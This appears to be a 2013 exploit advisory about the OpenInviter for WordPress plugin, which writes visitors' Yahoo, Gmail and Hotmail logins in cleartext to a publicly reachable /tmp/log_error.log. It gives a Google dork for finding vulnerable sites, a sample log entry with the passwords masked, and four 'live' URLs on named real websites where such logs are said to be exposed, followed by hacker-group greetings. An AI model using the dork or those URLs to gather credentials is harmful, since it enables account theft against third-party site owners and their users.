Login credentials for Yahoo!, Gmail, and more are left in cleartext in /tmp when provided to the WordPress OpenInviter plugin.
e8a8b49621ce0dec9b8616272cb96fc3f7695acc2706ece3bd2465439cb3ca17
##########################################################
# Title : OpenInviter for WordPress Disclose User Information
# Author : Ryuzaki Lawlet
# Blog : justryuz.blogspot.com / www.justryuz.com
# E-mail : ryuzaki_l@y7mail.com / justryuz@facebook.com / justryuz@linuxmail.org
# Date: Sat Jan 5/2013 (5.47 pm)
# Vendor: http://wordpress.org/extend/plugins/openinviter-for-wordpress/
# Type : Web Apps
# Tested on : Ubuntu / Window XP
# Dork ; inurl:/OpenInviter/tmp/ & inurl:/OpenInviter/tmp/log_error.log
##########################################################
---->
#--info about OpenInviter for WordPress:
>> Allow your visitors to invite their contacts from Yahoo!, GMail, AOL, Hotmail and other providers to your blog.
Exploit:
all login user with this plugin have log record with email/password in log_error file in folder /tmp/ and this log_error file is disclose user information like email/password in main mail Yahoo!, GMail, AOL, Hotmail and other providers
Example
[Years-month-day TIME] Local Debugger
----------DETAILS START----------
TRANSPORT: curl
SERVICE: hotmail
USER: victim@hotmail.com
PASSWORD: *********
STEPS:
initial_get :
URL: http://login.live.com/login.srf?id=2
METHOD: GET
RESPONSE: OK
login_post :
URL: https://login.live.com/ppsecure/post.srf?id=2&bk=1314918491
METHOD: POST
ELEMENTS:
PPSX=Passp
PwdPad=
type=
PPFT=ChJRMpJiZhTe4Z7X92sBFddI9M!tmfKtPFtflhAC1VeryloMgt7rVPjP6ADrF!rndQQRq2ZVzysXjuyAYS9NjIe5*OllJx!vK7xAU3ym0ZdKQakLQgOgVnTZn8N81jKUy00TaxC8acf!uMH!sH56Y3GputfpqyBGW1FwrNVFXvun2MwBOPUKs!mWshzl0CYxwuMyGG*0vC1yLpHNXZEgrN!7wezhHpooEH3Sox*ThDrs
LoginOptions=3
login=victim@hotmail.com
passwd=***********
RESPONSE: OK
first_redirect :
URL: http://www.hotmail.msn.com/cgi-bin/sbox?t=9ikSpGCZTCYwY3a5CuPibCZnDn3GN5e*OrIs5kzbdHvcgNQ610Cgps14x5lTVph*hWu0fdotwA4j7zZubNVU36uA0ag!cfBdMn9G!BcYoxELnC1Uue0m96tijFO744DPJy&p=9TSxWDG0OAapNedMZ1LMYVhOLboD26IovMvgl2rTjU5pSHOcPyYJWT8vdIcp7B0!9asl4R0AUTIXJnwxk7tqrNDQFa8jRiV7P3DsXuMRz4HrkvEmy3oX8VvFMHMhrOm0vX6C3OSrjvPpmuluxkGCAviJzvHjPDhT4YhLdhpNW0U4mVYL7rTKlTayPOqjGXnEAA&mkt=EN-US&lc=1033&id=2
METHOD: GET
RESPONSE: FAILED
----------DETAILS END----------
#--Demo / live
http://brsinfo.com/cares/wp-content/plugins/contest/OpenInviter/tmp/log_error.log
http://www.123employee.com/wp-content/plugins/contest/OpenInviter/tmp/log_error.log
http://realestatemegalopolis.com/in/wp-content/plugins/contest/OpenInviter/tmp/log_error.log
http://www.learnpassion.net/lp/wp-content/plugins/contest/OpenInviter/tmp/log_error.log
and many at google :v....
#---->
Screenshot / Preview
http://i.imgur.com/tKILJ.png
<!----
#==================================================<Greet>==================================================#
# Sbkiller * Xay * HeavenSe7en * Lonely * Skiddo * Ben * DzDzul * Sykes * RedJohn * LodVViP * PhiberOptick #
# KedAns-Dz * r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com) * NuxbieCyber ..all #
# CyberSec Crew * Cyber 4rmy * T3D Hacker * DevilSec * RileksCrew * TBD * Newbie3vilc063rs * MyHex * GaySec #
# www.1337day.com /.net /.org * packetstormsecurity.org * cxsecurity * All Security and Exploits #
#===========================================================================================================#